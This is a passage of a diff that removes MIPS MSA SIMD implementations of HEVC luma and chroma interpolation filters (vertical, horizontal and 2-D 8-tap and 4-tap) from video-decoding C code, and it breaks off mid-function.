- v16i8 src0, src1, src2, src3, src4, src5, src6, src7, src8, src9, src10; - v16i8 src10_r, src32_r, src54_r, src76_r, src98_r; - v16i8 src21_r, 
src43_r, src65_r, src87_r, src109_r; - v8i16 dst0_r, dst1_r, dst2_r, dst3_r; - v16i8 src10_l, src32_l, src54_l, src76_l, src98_l; - v16i8 src21_l, src43_l, src65_l, src87_l, src109_l; - v16i8 src2110, src4332, src6554, src8776, src10998; - v8i16 dst0_l, dst1_l; - v8i16 filter_vec, const_vec; - v8i16 filt0, filt1, filt2, filt3; - - src -= (3 * src_stride); - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - LD_SB7(src, src_stride, src0, src1, src2, src3, src4, src5, src6); - src += (7 * src_stride); - XORI_B7_128_SB(src0, src1, src2, src3, src4, src5, src6); - ILVR_B4_SB(src1, src0, src3, src2, src5, src4, src2, src1, - src10_r, src32_r, src54_r, src21_r); - ILVR_B2_SB(src4, src3, src6, src5, src43_r, src65_r); - ILVL_B4_SB(src1, src0, src3, src2, src5, src4, src2, src1, - src10_l, src32_l, src54_l, src21_l); - ILVL_B2_SB(src4, src3, src6, src5, src43_l, src65_l); - ILVR_D3_SB(src21_l, src10_l, src43_l, src32_l, src65_l, src54_l, - src2110, src4332, src6554); - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB4(src, src_stride, src7, src8, src9, src10); - src += (4 * src_stride); - XORI_B4_128_SB(src7, src8, src9, src10); - ILVR_B4_SB(src7, src6, src8, src7, src9, src8, src10, src9, - src76_r, src87_r, src98_r, src109_r); - ILVL_B4_SB(src7, src6, src8, src7, src9, src8, src10, src9, - src76_l, src87_l, src98_l, src109_l); - ILVR_D2_SB(src87_l, src76_l, src109_l, src98_l, src8776, src10998); - - dst0_r = const_vec; - DPADD_SB4_SH(src10_r, src32_r, src54_r, src76_r, - filt0, filt1, filt2, filt3, - dst0_r, dst0_r, dst0_r, dst0_r); - dst1_r = const_vec; - DPADD_SB4_SH(src21_r, src43_r, src65_r, src87_r, - filt0, filt1, filt2, filt3, - dst1_r, dst1_r, dst1_r, dst1_r); - dst2_r = const_vec; - DPADD_SB4_SH(src32_r, src54_r, src76_r, src98_r, - filt0, filt1, filt2, filt3, - dst2_r, dst2_r, dst2_r, dst2_r); - dst3_r = const_vec; - DPADD_SB4_SH(src43_r, src65_r, src87_r, src109_r, - filt0, filt1, filt2, filt3, - dst3_r, dst3_r, dst3_r, dst3_r); - dst0_l = const_vec; - DPADD_SB4_SH(src2110, src4332, src6554, src8776, - filt0, filt1, filt2, filt3, - dst0_l, dst0_l, dst0_l, dst0_l); - dst1_l = const_vec; - DPADD_SB4_SH(src4332, src6554, src8776, src10998, - filt0, filt1, filt2, filt3, - dst1_l, dst1_l, dst1_l, dst1_l); - - ST_SH4(dst0_r, dst1_r, dst2_r, dst3_r, dst, dst_stride); - ST_D4(dst0_l, dst1_l, 0, 1, 0, 1, dst + 8, dst_stride); - dst += (4 * dst_stride); - - src10_r = src54_r; - src32_r = src76_r; - src54_r = src98_r; - src21_r = src65_r; - src43_r = src87_r; - src65_r = src109_r; - src2110 = src6554; - src4332 = src8776; - src6554 = src10998; - src6 = src10; - } -} - -static void hevc_vt_8t_16multx4mult_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height, - int32_t width) -{ - const uint8_t *src_tmp; - int16_t *dst_tmp; - int32_t loop_cnt, cnt; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7, src8, src9, src10; - v16i8 src10_r, src32_r, src54_r, src76_r, src98_r; - v16i8 src21_r, src43_r, src65_r, src87_r, src109_r; - v8i16 dst0_r, dst1_r, dst2_r, dst3_r; - v16i8 src10_l, src32_l, src54_l, src76_l, src98_l; - v16i8 src21_l, src43_l, src65_l, src87_l, src109_l; - v8i16 dst0_l, dst1_l, dst2_l, dst3_l; - v8i16 filter_vec, const_vec; - v8i16 filt0, filt1, filt2, filt3; - - src -= (3 * src_stride); - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H4_SH(filter_vec, 0, 1, 
2, 3, filt0, filt1, filt2, filt3); - - for (cnt = width >> 4; cnt--;) { - src_tmp = src; - dst_tmp = dst; - - LD_SB7(src_tmp, src_stride, src0, src1, src2, src3, src4, src5, src6); - src_tmp += (7 * src_stride); - XORI_B7_128_SB(src0, src1, src2, src3, src4, src5, src6); - ILVR_B4_SB(src1, src0, src3, src2, src5, src4, src2, src1, - src10_r, src32_r, src54_r, src21_r); - ILVR_B2_SB(src4, src3, src6, src5, src43_r, src65_r); - ILVL_B4_SB(src1, src0, src3, src2, src5, src4, src2, src1, - src10_l, src32_l, src54_l, src21_l); - ILVL_B2_SB(src4, src3, src6, src5, src43_l, src65_l); - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB4(src_tmp, src_stride, src7, src8, src9, src10); - src_tmp += (4 * src_stride); - XORI_B4_128_SB(src7, src8, src9, src10); - ILVR_B4_SB(src7, src6, src8, src7, src9, src8, src10, src9, - src76_r, src87_r, src98_r, src109_r); - ILVL_B4_SB(src7, src6, src8, src7, src9, src8, src10, src9, - src76_l, src87_l, src98_l, src109_l); - - dst0_r = const_vec; - DPADD_SB4_SH(src10_r, src32_r, src54_r, src76_r, - filt0, filt1, filt2, filt3, - dst0_r, dst0_r, dst0_r, dst0_r); - dst1_r = const_vec; - DPADD_SB4_SH(src21_r, src43_r, src65_r, src87_r, - filt0, filt1, filt2, filt3, - dst1_r, dst1_r, dst1_r, dst1_r); - dst2_r = const_vec; - DPADD_SB4_SH(src32_r, src54_r, src76_r, src98_r, - filt0, filt1, filt2, filt3, - dst2_r, dst2_r, dst2_r, dst2_r); - dst3_r = const_vec; - DPADD_SB4_SH(src43_r, src65_r, src87_r, src109_r, - filt0, filt1, filt2, filt3, - dst3_r, dst3_r, dst3_r, dst3_r); - dst0_l = const_vec; - DPADD_SB4_SH(src10_l, src32_l, src54_l, src76_l, - filt0, filt1, filt2, filt3, - dst0_l, dst0_l, dst0_l, dst0_l); - dst1_l = const_vec; - DPADD_SB4_SH(src21_l, src43_l, src65_l, src87_l, - filt0, filt1, filt2, filt3, - dst1_l, dst1_l, dst1_l, dst1_l); - dst2_l = const_vec; - DPADD_SB4_SH(src32_l, src54_l, src76_l, src98_l, - filt0, filt1, filt2, filt3, - dst2_l, dst2_l, dst2_l, dst2_l); - dst3_l = const_vec; - DPADD_SB4_SH(src43_l, src65_l, src87_l, src109_l, - filt0, filt1, filt2, filt3, - dst3_l, dst3_l, dst3_l, dst3_l); - - ST_SH4(dst0_r, dst1_r, dst2_r, dst3_r, dst_tmp, dst_stride); - ST_SH4(dst0_l, dst1_l, dst2_l, dst3_l, dst_tmp + 8, dst_stride); - dst_tmp += (4 * dst_stride); - - src10_r = src54_r; - src32_r = src76_r; - src54_r = src98_r; - src21_r = src65_r; - src43_r = src87_r; - src65_r = src109_r; - src10_l = src54_l; - src32_l = src76_l; - src54_l = src98_l; - src21_l = src65_l; - src43_l = src87_l; - src65_l = src109_l; - src6 = src10; - } - - src += 16; - dst += 16; - } -} - -static void hevc_vt_8t_16w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - hevc_vt_8t_16multx4mult_msa(src, src_stride, dst, dst_stride, - filter, height, 16); -} - -static void hevc_vt_8t_24w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - hevc_vt_8t_16multx4mult_msa(src, src_stride, dst, dst_stride, - filter, height, 16); - hevc_vt_8t_8w_msa(src + 16, src_stride, dst + 16, dst_stride, - filter, height); -} - -static void hevc_vt_8t_32w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - hevc_vt_8t_16multx4mult_msa(src, src_stride, dst, dst_stride, - filter, height, 32); -} - -static void hevc_vt_8t_48w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - hevc_vt_8t_16multx4mult_msa(src, 
src_stride, dst, dst_stride, - filter, height, 48); -} - -static void hevc_vt_8t_64w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - hevc_vt_8t_16multx4mult_msa(src, src_stride, dst, dst_stride, - filter, height, 64); -} - -static void hevc_hv_8t_4w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter_x, const int8_t *filter_y, - int32_t height) -{ - uint32_t loop_cnt; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7, src8, src9, src10; - v8i16 filt0, filt1, filt2, filt3; - v8i16 filt_h0, filt_h1, filt_h2, filt_h3; - v16i8 mask1, mask2, mask3; - v8i16 filter_vec, const_vec; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5, vec6, vec7; - v16i8 vec8, vec9, vec10, vec11, vec12, vec13, vec14, vec15; - v8i16 dst30, dst41, dst52, dst63, dst66, dst97, dst108; - v4i32 dst0_r, dst1_r, dst2_r, dst3_r; - v8i16 dst10_r, dst32_r, dst54_r, dst76_r, dst98_r; - v8i16 dst21_r, dst43_r, dst65_r, dst87_r, dst109_r; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr + 16); - - src -= ((3 * src_stride) + 3); - filter_vec = LD_SH(filter_x); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - filter_vec = LD_SH(filter_y); - UNPCK_R_SB_SH(filter_vec, filter_vec); - - SPLATI_W4_SH(filter_vec, filt_h0, filt_h1, filt_h2, filt_h3); - - mask1 = mask0 + 2; - mask2 = mask0 + 4; - mask3 = mask0 + 6; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - LD_SB7(src, src_stride, src0, src1, src2, src3, src4, src5, src6); - src += (7 * src_stride); - XORI_B7_128_SB(src0, src1, src2, src3, src4, src5, src6); - - VSHF_B4_SB(src0, src3, mask0, mask1, mask2, mask3, vec0, vec1, vec2, vec3); - VSHF_B4_SB(src1, src4, mask0, mask1, mask2, mask3, vec4, vec5, vec6, vec7); - VSHF_B4_SB(src2, src5, mask0, mask1, mask2, mask3, - vec8, vec9, vec10, vec11); - VSHF_B4_SB(src3, src6, mask0, mask1, mask2, mask3, - vec12, vec13, vec14, vec15); - dst30 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst30, dst30, dst30, dst30); - dst41 = const_vec; - DPADD_SB4_SH(vec4, vec5, vec6, vec7, filt0, filt1, filt2, filt3, - dst41, dst41, dst41, dst41); - dst52 = const_vec; - DPADD_SB4_SH(vec8, vec9, vec10, vec11, filt0, filt1, filt2, filt3, - dst52, dst52, dst52, dst52); - dst63 = const_vec; - DPADD_SB4_SH(vec12, vec13, vec14, vec15, filt0, filt1, filt2, filt3, - dst63, dst63, dst63, dst63); - - ILVRL_H2_SH(dst41, dst30, dst10_r, dst43_r); - ILVRL_H2_SH(dst52, dst41, dst21_r, dst54_r); - ILVRL_H2_SH(dst63, dst52, dst32_r, dst65_r); - dst66 = (v8i16) __msa_splati_d((v2i64) dst63, 1); - - for (loop_cnt = height >> 2; loop_cnt--;) { - LD_SB4(src, src_stride, src7, src8, src9, src10); - src += (4 * src_stride); - XORI_B4_128_SB(src7, src8, src9, src10); - - VSHF_B4_SB(src7, src9, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - VSHF_B4_SB(src8, src10, mask0, mask1, mask2, mask3, - vec4, vec5, vec6, vec7); - dst97 = const_vec; - dst108 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst97, dst97, dst97, dst97); - DPADD_SB4_SH(vec4, vec5, vec6, vec7, filt0, filt1, filt2, filt3, - dst108, dst108, dst108, dst108); - - dst76_r = __msa_ilvr_h(dst97, dst66); - ILVRL_H2_SH(dst108, dst97, dst87_r, dst109_r); - dst66 = (v8i16) __msa_splati_d((v2i64) dst97, 1); - dst98_r = __msa_ilvr_h(dst66, dst108); - - dst0_r = HEVC_FILT_8TAP(dst10_r, dst32_r, dst54_r, dst76_r, - filt_h0, filt_h1, filt_h2, filt_h3); - dst1_r = HEVC_FILT_8TAP(dst21_r, dst43_r, dst65_r, 
dst87_r, - filt_h0, filt_h1, filt_h2, filt_h3); - dst2_r = HEVC_FILT_8TAP(dst32_r, dst54_r, dst76_r, dst98_r, - filt_h0, filt_h1, filt_h2, filt_h3); - dst3_r = HEVC_FILT_8TAP(dst43_r, dst65_r, dst87_r, dst109_r, - filt_h0, filt_h1, filt_h2, filt_h3); - SRA_4V(dst0_r, dst1_r, dst2_r, dst3_r, 6); - PCKEV_H2_SW(dst1_r, dst0_r, dst3_r, dst2_r, dst0_r, dst2_r); - ST_D4(dst0_r, dst2_r, 0, 1, 0, 1, dst, dst_stride); - dst += (4 * dst_stride); - - dst10_r = dst54_r; - dst32_r = dst76_r; - dst54_r = dst98_r; - dst21_r = dst65_r; - dst43_r = dst87_r; - dst65_r = dst109_r; - dst66 = (v8i16) __msa_splati_d((v2i64) dst108, 1); - } -} - -static void hevc_hv_8t_8multx1mult_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y, - int32_t height, int32_t width) -{ - uint32_t loop_cnt, cnt; - const uint8_t *src_tmp; - int16_t *dst_tmp; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v8i16 filt0, filt1, filt2, filt3; - v8i16 filt_h0, filt_h1, filt_h2, filt_h3; - v16i8 mask1, mask2, mask3; - v8i16 filter_vec, const_vec; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5, vec6, vec7; - v16i8 vec8, vec9, vec10, vec11, vec12, vec13, vec14, vec15; - v8i16 dst0, dst1, dst2, dst3, dst4, dst5, dst6, dst7; - v4i32 dst0_r, dst0_l; - v8i16 dst10_r, dst32_r, dst54_r, dst76_r; - v8i16 dst10_l, dst32_l, dst54_l, dst76_l; - v16i8 mask0 = { 0, 1, 1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6, 7, 7, 8 }; - - src -= ((3 * src_stride) + 3); - filter_vec = LD_SH(filter_x); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - filter_vec = LD_SH(filter_y); - UNPCK_R_SB_SH(filter_vec, filter_vec); - - SPLATI_W4_SH(filter_vec, filt_h0, filt_h1, filt_h2, filt_h3); - - mask1 = mask0 + 2; - mask2 = mask0 + 4; - mask3 = mask0 + 6; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (cnt = width >> 3; cnt--;) { - src_tmp = src; - dst_tmp = dst; - - LD_SB7(src_tmp, src_stride, src0, src1, src2, src3, src4, src5, src6); - src_tmp += (7 * src_stride); - XORI_B7_128_SB(src0, src1, src2, src3, src4, src5, src6); - - /* row 0 row 1 row 2 row 3 */ - VSHF_B4_SB(src0, src0, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - VSHF_B4_SB(src1, src1, mask0, mask1, mask2, mask3, - vec4, vec5, vec6, vec7); - VSHF_B4_SB(src2, src2, mask0, mask1, mask2, mask3, - vec8, vec9, vec10, vec11); - VSHF_B4_SB(src3, src3, mask0, mask1, mask2, mask3, - vec12, vec13, vec14, vec15); - dst0 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst0, dst0, dst0, dst0); - dst1 = const_vec; - DPADD_SB4_SH(vec4, vec5, vec6, vec7, filt0, filt1, filt2, filt3, - dst1, dst1, dst1, dst1); - dst2 = const_vec; - DPADD_SB4_SH(vec8, vec9, vec10, vec11, filt0, filt1, filt2, filt3, - dst2, dst2, dst2, dst2); - dst3 = const_vec; - DPADD_SB4_SH(vec12, vec13, vec14, vec15, filt0, filt1, filt2, filt3, - dst3, dst3, dst3, dst3); - - /* row 4 row 5 row 6 */ - VSHF_B4_SB(src4, src4, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - VSHF_B4_SB(src5, src5, mask0, mask1, mask2, mask3, - vec4, vec5, vec6, vec7); - VSHF_B4_SB(src6, src6, mask0, mask1, mask2, mask3, - vec8, vec9, vec10, vec11); - dst4 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst4, dst4, dst4, dst4); - dst5 = const_vec; - DPADD_SB4_SH(vec4, vec5, vec6, vec7, filt0, filt1, filt2, filt3, - dst5, dst5, dst5, dst5); - dst6 = const_vec; - DPADD_SB4_SH(vec8, vec9, vec10, vec11, filt0, filt1, filt2, filt3, - dst6, dst6, dst6, dst6); - - for (loop_cnt = 
height; loop_cnt--;) { - src7 = LD_SB(src_tmp); - src7 = (v16i8) __msa_xori_b((v16u8) src7, 128); - src_tmp += src_stride; - - VSHF_B4_SB(src7, src7, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst7 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst7, dst7, dst7, dst7); - - ILVRL_H2_SH(dst1, dst0, dst10_r, dst10_l); - ILVRL_H2_SH(dst3, dst2, dst32_r, dst32_l); - ILVRL_H2_SH(dst5, dst4, dst54_r, dst54_l); - ILVRL_H2_SH(dst7, dst6, dst76_r, dst76_l); - dst0_r = HEVC_FILT_8TAP(dst10_r, dst32_r, dst54_r, dst76_r, - filt_h0, filt_h1, filt_h2, filt_h3); - dst0_l = HEVC_FILT_8TAP(dst10_l, dst32_l, dst54_l, dst76_l, - filt_h0, filt_h1, filt_h2, filt_h3); - dst0_r >>= 6; - dst0_l >>= 6; - - dst0_r = (v4i32) __msa_pckev_h((v8i16) dst0_l, (v8i16) dst0_r); - ST_SW(dst0_r, dst_tmp); - dst_tmp += dst_stride; - - dst0 = dst1; - dst1 = dst2; - dst2 = dst3; - dst3 = dst4; - dst4 = dst5; - dst5 = dst6; - dst6 = dst7; - } - - src += 8; - dst += 8; - } -} - -static void hevc_hv_8t_8w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter_x, const int8_t *filter_y, - int32_t height) -{ - hevc_hv_8t_8multx1mult_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y, height, 8); -} - -static void hevc_hv_8t_12w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter_x, const int8_t *filter_y, - int32_t height) -{ - uint32_t loop_cnt; - const uint8_t *src_tmp; - int16_t *dst_tmp; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7, src8, src9, src10; - v16i8 mask0, mask1, mask2, mask3, mask4, mask5, mask6, mask7; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5, vec6, vec7; - v16i8 vec8, vec9, vec10, vec11, vec12, vec13, vec14, vec15; - v8i16 filt0, filt1, filt2, filt3, filt_h0, filt_h1, filt_h2, filt_h3; - v8i16 filter_vec, const_vec; - v8i16 dst0, dst1, dst2, dst3, dst4, dst5, dst6, dst7; - v8i16 dst30, dst41, dst52, dst63, dst66, dst97, dst108; - v8i16 dst10_r, dst32_r, dst54_r, dst76_r, dst98_r, dst21_r, dst43_r; - v8i16 dst65_r, dst87_r, dst109_r, dst10_l, dst32_l, dst54_l, dst76_l; - v4i32 dst0_r, dst0_l, dst1_r, dst2_r, dst3_r; - - src -= ((3 * src_stride) + 3); - filter_vec = LD_SH(filter_x); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - filter_vec = LD_SH(filter_y); - UNPCK_R_SB_SH(filter_vec, filter_vec); - - SPLATI_W4_SH(filter_vec, filt_h0, filt_h1, filt_h2, filt_h3); - - mask0 = LD_SB(ff_hevc_mask_arr); - mask1 = mask0 + 2; - mask2 = mask0 + 4; - mask3 = mask0 + 6; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - src_tmp = src; - dst_tmp = dst; - - LD_SB7(src_tmp, src_stride, src0, src1, src2, src3, src4, src5, src6); - src_tmp += (7 * src_stride); - XORI_B7_128_SB(src0, src1, src2, src3, src4, src5, src6); - - /* row 0 row 1 row 2 row 3 */ - VSHF_B4_SB(src0, src0, mask0, mask1, mask2, mask3, vec0, vec1, vec2, vec3); - VSHF_B4_SB(src1, src1, mask0, mask1, mask2, mask3, vec4, vec5, vec6, vec7); - VSHF_B4_SB(src2, src2, mask0, mask1, mask2, mask3, vec8, vec9, vec10, - vec11); - VSHF_B4_SB(src3, src3, mask0, mask1, mask2, mask3, vec12, vec13, vec14, - vec15); - dst0 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, dst0, dst0, - dst0, dst0); - dst1 = const_vec; - DPADD_SB4_SH(vec4, vec5, vec6, vec7, filt0, filt1, filt2, filt3, dst1, dst1, - dst1, dst1); - dst2 = const_vec; - DPADD_SB4_SH(vec8, vec9, vec10, vec11, filt0, filt1, filt2, filt3, dst2, - dst2, dst2, dst2); - dst3 = const_vec; - 
DPADD_SB4_SH(vec12, vec13, vec14, vec15, filt0, filt1, filt2, filt3, dst3, - dst3, dst3, dst3); - - /* row 4 row 5 row 6 */ - VSHF_B4_SB(src4, src4, mask0, mask1, mask2, mask3, vec0, vec1, vec2, vec3); - VSHF_B4_SB(src5, src5, mask0, mask1, mask2, mask3, vec4, vec5, vec6, vec7); - VSHF_B4_SB(src6, src6, mask0, mask1, mask2, mask3, vec8, vec9, vec10, - vec11); - dst4 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, dst4, dst4, - dst4, dst4); - dst5 = const_vec; - DPADD_SB4_SH(vec4, vec5, vec6, vec7, filt0, filt1, filt2, filt3, dst5, dst5, - dst5, dst5); - dst6 = const_vec; - DPADD_SB4_SH(vec8, vec9, vec10, vec11, filt0, filt1, filt2, filt3, dst6, - dst6, dst6, dst6); - - for (loop_cnt = height; loop_cnt--;) { - src7 = LD_SB(src_tmp); - src7 = (v16i8) __msa_xori_b((v16u8) src7, 128); - src_tmp += src_stride; - - VSHF_B4_SB(src7, src7, mask0, mask1, mask2, mask3, vec0, vec1, vec2, - vec3); - dst7 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, dst7, - dst7, dst7, dst7); - - ILVRL_H2_SH(dst1, dst0, dst10_r, dst10_l); - ILVRL_H2_SH(dst3, dst2, dst32_r, dst32_l); - ILVRL_H2_SH(dst5, dst4, dst54_r, dst54_l); - ILVRL_H2_SH(dst7, dst6, dst76_r, dst76_l); - dst0_r = HEVC_FILT_8TAP(dst10_r, dst32_r, dst54_r, dst76_r, filt_h0, - filt_h1, filt_h2, filt_h3); - dst0_l = HEVC_FILT_8TAP(dst10_l, dst32_l, dst54_l, dst76_l, filt_h0, - filt_h1, filt_h2, filt_h3); - dst0_r >>= 6; - dst0_l >>= 6; - - dst0_r = (v4i32) __msa_pckev_h((v8i16) dst0_l, (v8i16) dst0_r); - ST_SW(dst0_r, dst_tmp); - dst_tmp += dst_stride; - - dst0 = dst1; - dst1 = dst2; - dst2 = dst3; - dst3 = dst4; - dst4 = dst5; - dst5 = dst6; - dst6 = dst7; - } - - src += 8; - dst += 8; - - mask4 = LD_SB(ff_hevc_mask_arr + 16); - mask5 = mask4 + 2; - mask6 = mask4 + 4; - mask7 = mask4 + 6; - - LD_SB7(src, src_stride, src0, src1, src2, src3, src4, src5, src6); - src += (7 * src_stride); - XORI_B7_128_SB(src0, src1, src2, src3, src4, src5, src6); - - VSHF_B4_SB(src0, src3, mask4, mask5, mask6, mask7, vec0, vec1, vec2, vec3); - VSHF_B4_SB(src1, src4, mask4, mask5, mask6, mask7, vec4, vec5, vec6, vec7); - VSHF_B4_SB(src2, src5, mask4, mask5, mask6, mask7, vec8, vec9, vec10, - vec11); - VSHF_B4_SB(src3, src6, mask4, mask5, mask6, mask7, vec12, vec13, vec14, - vec15); - dst30 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, dst30, - dst30, dst30, dst30); - dst41 = const_vec; - DPADD_SB4_SH(vec4, vec5, vec6, vec7, filt0, filt1, filt2, filt3, dst41, - dst41, dst41, dst41); - dst52 = const_vec; - DPADD_SB4_SH(vec8, vec9, vec10, vec11, filt0, filt1, filt2, filt3, dst52, - dst52, dst52, dst52); - dst63 = const_vec; - DPADD_SB4_SH(vec12, vec13, vec14, vec15, filt0, filt1, filt2, filt3, dst63, - dst63, dst63, dst63); - - ILVRL_H2_SH(dst41, dst30, dst10_r, dst43_r); - ILVRL_H2_SH(dst52, dst41, dst21_r, dst54_r); - ILVRL_H2_SH(dst63, dst52, dst32_r, dst65_r); - - dst66 = (v8i16) __msa_splati_d((v2i64) dst63, 1); - - for (loop_cnt = height >> 2; loop_cnt--;) { - LD_SB4(src, src_stride, src7, src8, src9, src10); - src += (4 * src_stride); - XORI_B4_128_SB(src7, src8, src9, src10); - - VSHF_B4_SB(src7, src9, mask4, mask5, mask6, mask7, vec0, vec1, vec2, - vec3); - VSHF_B4_SB(src8, src10, mask4, mask5, mask6, mask7, vec4, vec5, vec6, - vec7); - dst97 = const_vec; - dst108 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, dst97, - dst97, dst97, dst97); - DPADD_SB4_SH(vec4, vec5, vec6, vec7, filt0, filt1, filt2, filt3, dst108, - dst108, dst108, 
dst108); - - dst76_r = __msa_ilvr_h(dst97, dst66); - ILVRL_H2_SH(dst108, dst97, dst87_r, dst109_r); - dst66 = (v8i16) __msa_splati_d((v2i64) dst97, 1); - dst98_r = __msa_ilvr_h(dst66, dst108); - - dst0_r = HEVC_FILT_8TAP(dst10_r, dst32_r, dst54_r, dst76_r, filt_h0, - filt_h1, filt_h2, filt_h3); - dst1_r = HEVC_FILT_8TAP(dst21_r, dst43_r, dst65_r, dst87_r, filt_h0, - filt_h1, filt_h2, filt_h3); - dst2_r = HEVC_FILT_8TAP(dst32_r, dst54_r, dst76_r, dst98_r, filt_h0, - filt_h1, filt_h2, filt_h3); - dst3_r = HEVC_FILT_8TAP(dst43_r, dst65_r, dst87_r, dst109_r, filt_h0, - filt_h1, filt_h2, filt_h3); - SRA_4V(dst0_r, dst1_r, dst2_r, dst3_r, 6); - PCKEV_H2_SW(dst1_r, dst0_r, dst3_r, dst2_r, dst0_r, dst2_r); - ST_D4(dst0_r, dst2_r, 0, 1, 0, 1, dst, dst_stride); - dst += (4 * dst_stride); - - dst10_r = dst54_r; - dst32_r = dst76_r; - dst54_r = dst98_r; - dst21_r = dst65_r; - dst43_r = dst87_r; - dst65_r = dst109_r; - dst66 = (v8i16) __msa_splati_d((v2i64) dst108, 1); - } -} - -static void hevc_hv_8t_16w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter_x, const int8_t *filter_y, - int32_t height) -{ - hevc_hv_8t_8multx1mult_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y, height, 16); -} - -static void hevc_hv_8t_24w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter_x, const int8_t *filter_y, - int32_t height) -{ - hevc_hv_8t_8multx1mult_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y, height, 24); -} - -static void hevc_hv_8t_32w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter_x, const int8_t *filter_y, - int32_t height) -{ - hevc_hv_8t_8multx1mult_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y, height, 32); -} - -static void hevc_hv_8t_48w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter_x, const int8_t *filter_y, - int32_t height) -{ - hevc_hv_8t_8multx1mult_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y, height, 48); -} - -static void hevc_hv_8t_64w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter_x, const int8_t *filter_y, - int32_t height) -{ - hevc_hv_8t_8multx1mult_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y, height, 64); -} - -static void hevc_hz_4t_4x2_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter) -{ - v8i16 filt0, filt1; - v16i8 src0, src1; - v16i8 mask1, vec0, vec1; - v8i16 dst0; - v8i16 filter_vec, const_vec; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr + 16); - - src -= 1; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - LD_SB2(src, src_stride, src0, src1); - XORI_B2_128_SB(src0, src1); - - VSHF_B2_SB(src0, src1, src0, src1, mask0, mask1, vec0, vec1); - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - - ST_D2(dst0, 0, 1, dst, dst_stride); -} - -static void hevc_hz_4t_4x4_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter) -{ - v8i16 filt0, filt1; - v16i8 src0, src1, src2, src3; - v16i8 mask1, vec0, vec1; - v8i16 dst0, dst1; - v8i16 